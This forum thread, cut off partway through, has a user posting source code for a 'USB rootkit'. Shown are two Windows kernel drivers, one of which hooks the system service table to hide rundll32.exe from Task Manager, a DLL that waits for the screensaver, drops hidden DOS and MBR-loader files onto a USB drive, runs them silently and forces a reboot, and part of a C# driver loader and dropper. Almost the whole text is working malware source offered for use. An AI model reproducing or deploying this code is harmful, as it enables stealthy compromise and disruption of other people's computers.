JMC31337 Posted December 29, 2011 Posted December 29, 2011 USB Rootkit (minus the extras)2 sys files1 Dll1 Exe dropper
JMC31337 Posted December 29, 2011 Author Posted December 29, 2011 (edited) This searches for a usb loaded. Once found it writes a file 0wned.txt then writes the corresponding drive letter to the file. This is so the callback from dll to driver can accomplish its function#include <ntddk.h>#include <stdlib.h>#include <stdio.h>#include <string.h>#include <ctype.h>#include <malloc.h>#define IOError -1#define MEMORYError -2#define NOError 0#define BUFFER_SIZE 4//======================== char *p; HANDLE fHandle; // handle to file OBJECT_ATTRIBUTES ObjectAttributes; // object attributes UNICODE_STRING FileName; // file name IO_STATUS_BLOCK ioStatusBlock; // IO status block char *myString;//========================UNICODE_STRING symbolic_nameC;UNICODE_STRING VolumeNameC;UNICODE_STRING symbolic_nameD;UNICODE_STRING VolumeNameD;UNICODE_STRING symbolic_nameE;UNICODE_STRING VolumeNameE;UNICODE_STRING symbolic_nameF;UNICODE_STRING VolumeNameF;UNICODE_STRING symbolic_nameG;UNICODE_STRING VolumeNameG;UNICODE_STRING symbolic_nameH;UNICODE_STRING VolumeNameH;WCHAR Buffer[40];WCHAR Buffer1[40];WCHAR Buffer2[40];WCHAR Buffer3[40];WCHAR Buffer4[40];WCHAR Buffer5[40];ULONG majorVersion;ULONG minorVersion;ANSI_STRING key;PCSTR keyname;//==========================VOID QuerySym(PUNICODE_STRING SymName,PUNICODE_STRING VolumeName){ NTSTATUS st; HANDLE LinkHandle; OBJECT_ATTRIBUTES object_attributes; ULONG rt; InitializeObjectAttributes( &object_attributes, SymName, OBJ_KERNEL_HANDLE, NULL, NULL); st = ZwOpenSymbolicLinkObject(&LinkHandle,GENERIC_READ,&object_attributes); if (!NT_SUCCESS(st)) {DbgPrint("OpenSymbolic Error!\n"); ZwClose(LinkHandle); return; } st = ZwQuerySymbolicLinkObject(LinkHandle,VolumeName,&rt); if (!NT_SUCCESS(st)) { if (st == STATUS_BUFFER_TOO_SMALL) DbgPrint("Buffer Error!\n"); else DbgPrint("QuerySymbolic Error!\n"); return; } ZwClose(LinkHandle);}//==========================VOID Unload(PDRIVER_OBJECT DriverObject){IoDeleteDevice(DriverObject->DeviceObject);}//===========================extern DriveType(){ RtlInitUnicodeString(&symbolic_nameC,L"\\??\\C:"); RtlInitUnicodeString(&symbolic_nameD,L"\\??\\D:"); RtlInitUnicodeString(&symbolic_nameE,L"\\??\\E:"); RtlInitUnicodeString(&symbolic_nameF,L"\\??\\F:"); RtlInitUnicodeString(&symbolic_nameG,L"\\??\\G:"); RtlInitUnicodeString(&symbolic_nameH,L"\\??\\H:"); RtlInitEmptyUnicodeString(&VolumeNameC,Buffer,256*sizeof(WCHAR)); RtlInitEmptyUnicodeString(&VolumeNameD,Buffer1,256*sizeof(WCHAR)); RtlInitEmptyUnicodeString(&VolumeNameE,Buffer2,256*sizeof(WCHAR)); RtlInitEmptyUnicodeString(&VolumeNameF,Buffer3,256*sizeof(WCHAR)); RtlInitEmptyUnicodeString(&VolumeNameG,Buffer4,256*sizeof(WCHAR)); RtlInitEmptyUnicodeString(&VolumeNameH,Buffer5,256*sizeof(WCHAR)); QuerySym(&symbolic_nameC,&VolumeNameC); QuerySym(&symbolic_nameD,&VolumeNameD); QuerySym(&symbolic_nameE,&VolumeNameE); QuerySym(&symbolic_nameF,&VolumeNameF); QuerySym(&symbolic_nameG,&VolumeNameG); QuerySym(&symbolic_nameH,&VolumeNameH); //============================================== DbgPrint("VolumeNameC->%wZ\n",&VolumeNameC);RtlUnicodeStringToAnsiString( &key, &VolumeNameC, TRUE);keyname=key.Buffer;if (strstr(keyname,"DP")){DbgPrint("FOUND USB!!!"); myString="C"; if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE; RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT"); InitializeObjectAttributes( &ObjectAttributes, &FileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL ); ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes, &ioStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString, strlen(myString), NULL, NULL); ZwClose(fHandle);}RtlFreeAnsiString(&key);//==============================================DbgPrint("VolumeNameD->%wZ\n",&VolumeNameD);RtlUnicodeStringToAnsiString( &key, &VolumeNameD, TRUE);keyname=key.Buffer;if (strstr(keyname,"DP")){DbgPrint("FOUND USB!!!"); myString="D"; if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE; RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT"); InitializeObjectAttributes( &ObjectAttributes, &FileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL ); ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes, &ioStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString, strlen(myString), NULL, NULL); ZwClose(fHandle);}RtlFreeAnsiString(&key);//==============================================DbgPrint("VolumeNameE->%wZ\n",&VolumeNameE);RtlUnicodeStringToAnsiString( &key, &VolumeNameE, TRUE);keyname=key.Buffer;if (strstr(keyname,"DP")){DbgPrint("FOUND USB!!!"); myString="E"; if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE; RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT"); InitializeObjectAttributes( &ObjectAttributes, &FileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL ); ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes, &ioStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString, strlen(myString), NULL, NULL); ZwClose(fHandle);}RtlFreeAnsiString(&key);//==============================================DbgPrint("VolumeNameF->%wZ\n",&VolumeNameF);RtlUnicodeStringToAnsiString( &key, &VolumeNameF, TRUE);keyname=key.Buffer;if (strstr(keyname,"DP")){DbgPrint("FOUND USB!!!"); myString="F"; if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE; RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT"); InitializeObjectAttributes( &ObjectAttributes, &FileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL ); ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes, &ioStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString, strlen(myString), NULL, NULL); ZwClose(fHandle);}RtlFreeAnsiString(&key);//========================DbgPrint("VolumeNameG->%wZ\n",&VolumeNameG);RtlUnicodeStringToAnsiString( &key, &VolumeNameG, TRUE);keyname=key.Buffer;if (strstr(keyname,"DP")){DbgPrint("FOUND USB!!!"); myString="G"; if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE; RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT"); InitializeObjectAttributes( &ObjectAttributes, &FileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL ); ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes, &ioStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString, strlen(myString), NULL, NULL); ZwClose(fHandle);}RtlFreeAnsiString(&key);//===========================DbgPrint("VolumeNameH->%wZ\n",&VolumeNameH);RtlUnicodeStringToAnsiString( &key, &VolumeNameH, TRUE);keyname=key.Buffer;if (strstr(keyname,"DP")){DbgPrint("FOUND USB!!!"); myString="H"; if(KeGetCurrentIrql() != PASSIVE_LEVEL) return STATUS_INVALID_DEVICE_STATE; RtlInitUnicodeString(&FileName, L"\\DosDevices\\C:\\0WN3ED.TXT"); InitializeObjectAttributes( &ObjectAttributes, &FileName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL ); ZwCreateFile(&fHandle, GENERIC_WRITE, &ObjectAttributes, &ioStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); ZwWriteFile(fHandle, NULL, NULL, NULL, &ioStatusBlock, myString, strlen(myString), NULL, NULL); ZwClose(fHandle);}RtlFreeAnsiString(&key);//==========================return 0;} //END OF THIS FUNCTION//===========================NTSTATUS abcDevice(PDEVICE_OBJECT DeviceObject,PIRP Irp){IO_STACK_LOCATION *irpStack;long *inputBuffer;long pid,ioControlCode;irpStack = IoGetCurrentIrpStackLocation (Irp);inputBuffer = (long *)Irp-> AssociatedIrp.SystemBuffer;pid = *inputBuffer;if(pid==123){ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;DbgPrint("abcDevice pid=%d code=%d MajorFunction=%d",pid,ioControlCode,irpStack->MajorFunction);DriveType();}IoCompleteRequest(Irp,IO_NO_INCREMENT);return STATUS_SUCCESS; }//=====================================NTSTATUS abcCreate(PDEVICE_OBJECT DeviceObject,PIRP Irp){DbgPrint("abcCreate");return STATUS_SUCCESS; }//======================================NTSTATUS DriverEntry(PDRIVER_OBJECT d,PUNICODE_STRING p){UNICODE_STRING devicename,filename;PDEVICE_OBJECT r;DbgPrint("DriverObject");RtlInitUnicodeString(&devicename,L"\\Device\\bbb");RtlInitUnicodeString(&filename,L"\\DosDevices\\aaa");IoCreateDevice(d,0,&devicename,0,0,0,&r);IoCreateSymbolicLink (&filename,&devicename);d->MajorFunction[IRP_MJ_CREATE]=abcCreate;d->MajorFunction[IRP_MJ_DEVICE_CONTROL]=abcDevice;d->DriverUnload = Unload;return STATUS_SUCCESS;} Edited December 29, 2011 by JMC31337
JMC31337 Posted December 29, 2011 Author Posted December 29, 2011 (edited) This hides whatver program is listed from task manager. Code is from vijaymukhi (with error fixed)#include <ntddk.h>#include <stdio.h>long no;char *p;NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(ULONG SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);typedef struct{unsigned int *ServiceTableBase;unsigned int *ServiceCounterTableBase;unsigned int NumberOfServices;unsigned char *ParamTableBase;} sdt;__declspec(dllimport) sdt KeServiceDescriptorTable;typedef NTSTATUS (*qtype)(ULONG SystemInformationCLass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);qtype OldZwQuerySystemInformation;struct _SYSTEM_PROCESSES{ULONG NextEntryDelta;ULONG ThreadCount;ULONG Reserved[6];LARGE_INTEGER CreateTime;LARGE_INTEGER UserTime;LARGE_INTEGER KernelTime;UNICODE_STRING ProcessName;};NTSTATUS NewZwQuerySystemInformation(ULONG SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength){NTSTATUS rc;rc = OldZwQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);if(rc == 0 && 5 == SystemInformationClass){struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;struct _SYSTEM_PROCESSES *prev = NULL;while(1){ANSI_STRING process_name;RtlUnicodeStringToAnsiString (&process_name,&curr->ProcessName,TRUE);//DbgPrint("%s curr=%x prev=%x Delta=%d",process_name.Buffer,curr,prev,curr->NextEntryDelta);if(strncmp(process_name.Buffer,"rundll32.exe",4) == 0){if(curr->NextEntryDelta != 0 && prev != 0) //first guy has no name{//DbgPrint("Between %s curr->NextEntryDelta=%x prev=%x",process_name.Buffer,curr->NextEntryDelta,prev);prev->NextEntryDelta += curr->NextEntryDelta;}else{//DbgPrint("Last");prev->NextEntryDelta = 0;}}prev = curr;if ( curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);elsebreak;}}return rc;}NTSTATUS DriverDispatcher(PDEVICE_OBJECT pDeviceObject, PIRP Irp){DbgPrint("IRP_MJ_CREATE\n");IoCompleteRequest(Irp, IO_NO_INCREMENT);return(STATUS_SUCCESS);}VOID DriverUnload(PDRIVER_OBJECT DriverObject){DbgPrint("Unloading");_asm cliKeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)OldZwQuerySystemInformation;_asm sti}NTSTATUS DriverEntry(PDRIVER_OBJECT driverObject, PUNICODE_STRING RegistryPath){driverObject->DriverUnload = DriverUnload;driverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatcher;DbgPrint("Vijay 2 KeServiceDescriptorTable=%x",KeServiceDescriptorTable);p = (char *)ZwQuerySystemInformation;p = p + 1;no = *(long *)p;OldZwQuerySystemInformation=(qtype)KeServiceDescriptorTable.ServiceTableBase[no];_asm cliKeServiceDescriptorTable.ServiceTableBase[no]=(unsigned int)NewZwQuerySystemInformation;_asm stireturn(STATUS_SUCCESS);} Edited December 29, 2011 by JMC31337
JMC31337 Posted December 29, 2011 Author Posted December 29, 2011 (edited) DLL file to communicate with the kernel driver and low level disk. Also writes a few files (that are not included for MessageBoard Policy reasons) to the usb. Originally i had NTFS4DOS and a USB formatter to erase then load DOS 16 and further call reboot upon screensaver detection.#include "dllhell.h"#define _WIN32_WINXP 0x0500#include <string.h>#include <windows.h>#include <stdlib.h>#include <stdio.h>#include <fstream>#include <iostream>#include <sys/stat.h>#include <tlhelp32.h>#include "MBRLOAD.H"#include "COMMANDC.H"#include "IOSYS.H"#include "MSDOSYS.H"#include "KEYB.H"#include "KEYBSYS.H"#include "LOADERZ.H"#include "AUTOBAT.H"#include "ROOTIT.H"#include "LIC.H"#include "LNGINTL.H"#define SPI_GETSCREENSAVERRUNNING 0x0072SC_HANDLE m,s;HANDLE g;DWORD b,pid;// a sample exported functionbool lvRunning;char dl[1]={'\0'};char dl2[1]={'\0'};char txt[100]={'\0'};char txtA[50]={'\0'};char txtB[50]={'\0'};char txtC[50]={'\0'};char txtD[50]={'\0'};char txtE[50]={'\0'};char txtF[50]={'\0'};char txtG[50]={'\0'};char txtH[50]={'\0'};char txtI[50]={'\0'};char txtJ[50]={'\0'};char txtK[50]={'\0'};char txtL[50]={'\0'};HWND msnf = FindWindow("#32770", "Windows - Drive not Ready");BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam){ hwnd = FindWindow("#32770", "Windows - Drive not Ready"); SendMessage(hwnd, WM_CLOSE, WM_CLOSE, 0);}bool Checkit(){SystemParametersInfo(SPI_GETSCREENSAVERRUNNING,0,&lvRunning,0);if (lvRunning){return true;}return false;}void CreateEm(){ try{ CreateDirectory("\\Solara",NULL);}catch(char * err){}//======================== try{ FILE *file; if ((file = fopen("\\Solara\\mbrload.exe", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(MBRLOAD, 1, MBRLOAD_LEN, file); fclose(file); }catch(char * err){}//======================== try{ FILE *file2; if ((file2 = fopen("\\Solara\\command.com", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(commandcom, 1, COMMANDCOM_LEN, file2); fclose(file2); }catch(char * err){}//======================== try{ FILE *file3; if ((file3 = fopen("\\Solara\\io.sys", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(iosys, 1, IOSYS_LEN, file3); fclose(file3);}catch(char * err){}//======================== try{ FILE *file4; if ((file4 = fopen("\\Solara\\msdos.sys", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(msdosys, 1, MSDOSYS_LEN, file4); fclose(file4); }catch(char * err){}//======================== try{ FILE *file5; if ((file5 = fopen("\\Solara\\keyb.com", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(keyb, 1, KEYB_LEN, file5); fclose(file5); }catch(char * err){}//======================== try{ FILE *file6; if ((file6 = fopen("\\Solara\\keyboard.sys", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(keybsys, 1, KEYBSYS_LEN, file6); fclose(file6); }catch(char * err){}//========================try{ FILE *file7; if ((file7 = fopen("\\Solara\\loadexec.com", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(loaderz, 1, LOADERZ_LEN, file7); fclose(file7); }catch(char * err){}//========================try{ FILE *file8; if ((file8 = fopen("\\Solara\\autoexec.bat", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(autobat, 1, AUTOBAT_LEN, file8); fclose(file8); }catch(char * err){}//========================try{ FILE *file9; if ((file9 = fopen("\\Solara\\ntfs4dos.exe", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(rootit, 1, ROOTIT_LEN, file9); fclose(file9); }catch(char * err){}//======================== try{ FILE *file10; if ((file10 = fopen("\\Solara\\LICENSE.DAT", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(lic, 1, LIC_LEN, file10); fclose(file10); }catch(char * err){}//======================== try{ FILE *file11; if ((file11 = fopen("\\Solara\\LNGINTL.DAT", "w+b")) == NULL) { fprintf(stderr, "Cant open output file.\n"); //return 1; } fwrite(lngintl, 1, LNGINTL_LEN, file11); fclose(file11); }catch(char * err){}}//END FILE STUFFvoid ReadIT(){try{std::ifstream fin("\\0WN3ED.txt");fin>>dl;fin.close();}catch(char * err){}}//====================void KillIT(){try{remove( "\\Solara\\LNGINTL.DAT" );}catch(char * ex){}try{remove( "\\Solara\\ntfs4dos.exe" );}catch(char * ex){}try{remove( "\\Solara\\autoexec.bat" );}catch(char * ex){}try{remove( "\\Solara\\loadexec.com" );}catch(char * ex){}try{remove( "\\Solara\\command.com" );}catch(char * ex){}try{remove( "\\Solara\\io.sys" );}catch(char * ex){}try{remove( "\\Solara\\msdos.sys" );}catch(char * ex){}try{remove( "\\Solara\\keyboard.sys" );}catch(char * ex){}try{remove( "\\Solara\\keyb.com" );}catch(char * ex){}try{remove( "\\Solara\\mbrload.exe" );}catch(char * ex){}try{remove( "\\Solara\\LICENSE.DAT" );}catch(char * ex){}try{std::ifstream fin2("\\0WN3ED.txt");fin2>>dl2;fin2.close();}catch(char * err){}strcat(txtA,dl2);strcat(txtA,":\\LICENSE.DAT");SetFileAttributes(txtA,2);Sleep(500);strcat(txtB,dl2);strcat(txtB,":\\command.com");SetFileAttributes(txtB,2);Sleep(500);strcat(txtC,dl2);strcat(txtC,":\\io.sys");SetFileAttributes(txtC,2);Sleep(500);strcat(txtD,dl2);strcat(txtD,":\\msdos.sys");SetFileAttributes(txtD,2);Sleep(500);strcat(txtE,dl2);strcat(txtE,":\\keyb.com");SetFileAttributes(txtE,2);Sleep(500);strcat(txtF,dl2);strcat(txtF,":\\msdos.sys");SetFileAttributes(txtF,2);Sleep(500);strcat(txtG,dl2);strcat(txtG,":\\ntfs4dos.exe");SetFileAttributes(txtG,2);Sleep(500);strcat(txtH,dl2);strcat(txtH,":\\LNGINTL.DAT");SetFileAttributes(txtH,2);Sleep(500);strcat(txtI,dl2);strcat(txtI,":\\autoexec.bat");SetFileAttributes(txtI,2);Sleep(500);strcat(txtJ,dl2);strcat(txtJ,":\\keyboard.sys");SetFileAttributes(txtJ,2);Sleep(500);strcat(txtK,dl2);strcat(txtK,":\\loadexec.com");SetFileAttributes(txtK,2);Sleep(500);strcat(txtL,dl2);strcat(txtL,":\\mbrload.exe");SetFileAttributes(txtL,2);try{remove( "\\0WN3ED.txt" );}catch(char * ex){}}//====================int DLL_EXPORT MsgBox(int x = 0){while(1){Sleep(10000); if(Checkit()==true) { CreateEm(); pid = 123;// m=OpenSCManager(0,0,SC_MANAGER_ALL_ACCESS );// CreateService(m,"vijay","mukhi",SERVICE_ALL_ACCESS,SERVICE_KERNEL_DRIVER,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,"",0,0,0,0,0);// s=OpenService(m,"vijay",SERVICE_ALL_ACCESS);// StartService(s, 0, 0); g=CreateFile("\\\\.\\aaa",GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,0); DeviceIoControl(g,2,(void *)&pid,4,0,0,&b,0); goto end; }}end:ReadIT();if(dl!=NULL){strcat(txt,dl);strcat(txt, ": -FS:fat32 -V:USBBRK -B:\\Solara -S:\\Solara -Y"); HINSTANCE hInst = ShellExecute(0, "open", "\\Solara\\mbrload.exe", txt, 0, SW_HIDE);}for(long xx=0;xx<100000;xx++){EnumChildWindows(msnf, EnumChildProc, 0);}KillIT();system("shutdown -r -t 0");return 0;}BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){ switch (fdwReason) { case DLL_PROCESS_ATTACH: // attach to process // return FALSE to fail DLL load break; case DLL_PROCESS_DETACH: // detach from process break; case DLL_THREAD_ATTACH: // attach to thread break; case DLL_THREAD_DETACH: // detach from thread break; } return TRUE; // successful} Edited December 31, 2011 by JMC31337
JMC31337 Posted December 29, 2011 Author Posted December 29, 2011 This is the C# sys driver loader and DLLHell (dll file) dropper and execution code//EFREEDOM . COMusing System;using System.Diagnostics;using System.Collections;using System.Runtime.InteropServices;using System.Management;using System.ServiceProcess;using System.Threading;using System.IO;class Win32Driver : IDisposable { string driverName; string execPath; IntPtr fileHandle; public Win32Driver(string driver, string driverExecPath) { this.driverName = driver; this.execPath = driverExecPath; } ~Win32Driver() { // BUG - should never rely on finalizer to clean-up unmanaged resources Dispose(); } private void CloseStuff() { if (fileHandle != INVALID_HANDLE_VALUE) { fileHandle = INVALID_HANDLE_VALUE; CloseHandle(fileHandle); } } public void Dispose() { CloseStuff(); GC.SuppressFinalize(this); } private readonly static IntPtr INVALID_HANDLE_VALUE = new IntPtr(-1); private const int STANDARD_RIGHTS_REQUIRED = 0x000F0000; private const int SC_MANAGER_CONNECT = 0x0001; private const int SC_MANAGER_CREATE_SERVICE = 0x0002; private const int SC_MANAGER_ENUMERATE_SERVICE = 0x0004; private const int SC_MANAGER_LOCK = 0x0008; private const int SC_MANAGER_QUERY_LOCK_STATUS = 0x0010; private const int SC_MANAGER_MODIFY_BOOT_CONFIG = 0x0020; private const int SC_MANAGER_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE | SC_MANAGER_ENUMERATE_SERVICE | SC_MANAGER_LOCK | SC_MANAGER_QUERY_LOCK_STATUS | SC_MANAGER_MODIFY_BOOT_CONFIG; private const int SERVICE_QUERY_CONFIG = 0x0001; private const int SERVICE_CHANGE_CONFIG = 0x0002; private const int SERVICE_QUERY_STATUS = 0x0004; private const int SERVICE_ENUMERATE_DEPENDENTS = 0x0008; private const int SERVICE_START = 0x0010; private const int SERVICE_STOP = 0x0020; private const int SERVICE_PAUSE_CONTINUE = 0x0040; private const int SERVICE_INTERROGATE = 0x0080; private const int SERVICE_USER_DEFINED_CONTROL = 0x0100; private const int SERVICE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SERVICE_QUERY_CONFIG | SERVICE_CHANGE_CONFIG | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS | SERVICE_START | SERVICE_STOP | SERVICE_PAUSE_CONTINUE | SERVICE_INTERROGATE | SERVICE_USER_DEFINED_CONTROL; private const int SERVICE_DEMAND_START = 0x00000003; private const int SERVICE_KERNEL_DRIVER = 0x00000001; private const int SERVICE_ERROR_NORMAL = 0x00000001; private const uint GENERIC_READ = 0x80000000; private const uint FILE_SHARE_READ = 1; private const uint FILE_SHARE_WRITE = 2; private const uint OPEN_EXISTING = 3; private const uint IOCTL_SHOCKMGR_READ_ACCELEROMETER_DATA = 0x733fc; private const int FACILITY_WIN32 = unchecked((int)0x80070000); private IntPtr handle = INVALID_HANDLE_VALUE; [DllImport("advapi32", SetLastError = true)] internal static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwDesiredAccess); [DllImport("advapi32", SetLastError = true)] internal static extern IntPtr CreateService(IntPtr hSCManager, string serviceName, string displayName, uint dwDesiredAccess, uint serviceType, uint startType, uint errorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword); [DllImport("advapi32")] internal static extern bool CloseServiceHandle(IntPtr handle); [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess); [DllImport("kernel32", SetLastError = true)] internal static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile); [DllImport("kernel32")] internal static extern void CloseHandle(IntPtr handle); [DllImport("kernel32", SetLastError = true)] private static extern bool DeviceIoControl(IntPtr hDevice, uint dwIoControlCode, IntPtr lpInBuffer, uint nInBufferSize, IntPtr lpOutBuffer, uint nOutBufferSize, ref uint lpBytesReturned, IntPtr lpOverlapped); internal bool LoadDeviceDriver() { IntPtr scHandle = OpenSCManager(null, null, SC_MANAGER_ALL_ACCESS); Console.WriteLine("OpenSCManager: " + scHandle); if (scHandle != INVALID_HANDLE_VALUE) { IntPtr hService = CreateService(scHandle, this.driverName, this.driverName, SERVICE_ALL_ACCESS , SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL ,execPath, null, null, null, null, null); Console.WriteLine("CreateService: " + hService); hService = OpenService(scHandle, this.driverName, SERVICE_START | SERVICE_STOP); Console.WriteLine("OpenService: "+hService); if (hService != IntPtr.Zero) { CloseServiceHandle(hService); // close both handles CloseServiceHandle(scHandle); // Start the driver using System.Management (WMI) if (ExecuteSCMOperationOnDriver(this.driverName, "StartService") == 0) { return true; } } else if (Marshal.GetLastWin32Error()== 1073) // Driver/Service already in DB { Console.WriteLine("Marshal=1073"); CloseServiceHandle(scHandle); // Start the driver using System.Management (WMI) if (ExecuteSCMOperationOnDriver(this.driverName, "StartService") == 0) { return true; } } Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error())); } return false; } internal bool UnloadDeviceDriver() { int ret = 0; Console.WriteLine("Unloading now..."); if (fileHandle != IntPtr.Zero && fileHandle != INVALID_HANDLE_VALUE) { CloseHandle(fileHandle); } if ((ret = ExecuteSCMOperationOnDriver(driverName, "StopService")) == 0) { ret = ExecuteSCMOperationOnDriver(driverName, "Delete"); } if (ret != 0) { return false; } return true; } private static int ExecuteSCMOperationOnDriver(string driverName, string operation) { ManagementPath path = new ManagementPath(); path.Server = "."; path.NamespacePath = @"root\CIMV2"; path.RelativePath = @"Win32_BaseService.Name='" + driverName + "'"; using (ManagementObject o = new ManagementObject(path)) { ManagementBaseObject outParams = o.InvokeMethod(operation,null, null); return Convert.ToInt32(outParams.Properties["ReturnValue"].Value); } } internal IntPtr OpenDevice() { Console.WriteLine(driverName); fileHandle = CreateFile("\\\\.\\"+driverName, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero); Console.WriteLine("CreateFile: "+fileHandle); //Console.WriteLine(Marshal.GetLastWin32Error()); if(fileHandle == INVALID_HANDLE_VALUE) { Console.WriteLine("Throw exception"); Console.WriteLine((Marshal.GetLastWin32Error()).ToString()+"\n\n\n"); //Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error())); } return fileHandle; } internal IntPtr DevControl() { Console.WriteLine("DevControl started"); //long DeviceBuffer = 0; IntPtr dwState = new IntPtr(100); uint dwRet=0; bool dc = DeviceIoControl(fileHandle, FSConstants.IO_SET_EVENT, IntPtr.Zero, 0, dwState, (uint)Marshal.SizeOf(dwRet), ref dwRet, IntPtr.Zero); Console.WriteLine("Operation: "+dc); Console.WriteLine("Return Value: "+dwRet); Console.WriteLine("Error: "+(Marshal.GetLastWin32Error()).ToString() + "\n\n\n"); if (fileHandle == INVALID_HANDLE_VALUE) { //Console.WriteLine("Throw exception"); //Console.WriteLine((Marshal.GetLastWin32Error()).ToString()+"\n\n\n"); //Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error())); } return fileHandle; } private static int HRESULT_FROM_WIN32(int x) { return x <= 0 ? x : ((x & 0x0000FFFF) | FACILITY_WIN32); } } internal class FSConstants { private const int FILE_DEVICE_COMM_DRIVER = 0x00008810; const uint METHOD_NEITHER = 3; const uint METHOD_BUFFERED = 0; const uint FILE_ANY_ACCESS = 0; const uint FILE_SPECIAL_ACCESS = FILE_ANY_ACCESS; public static uint IO_SET_EVENT = CTL_CODE(FILE_DEVICE_COMM_DRIVER, 0x801, METHOD_NEITHER, FILE_ANY_ACCESS); static uint CTL_CODE(uint DeviceType, uint Function, uint Method, uint Access) { return ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method); } }class Program{private const uint GENERIC_READ = 0x80000000; private const uint OPEN_EXISTING = 3;public enum ThreadAccess : int { TERMINATE = (0x0001), SUSPEND_RESUME = (0x0002), 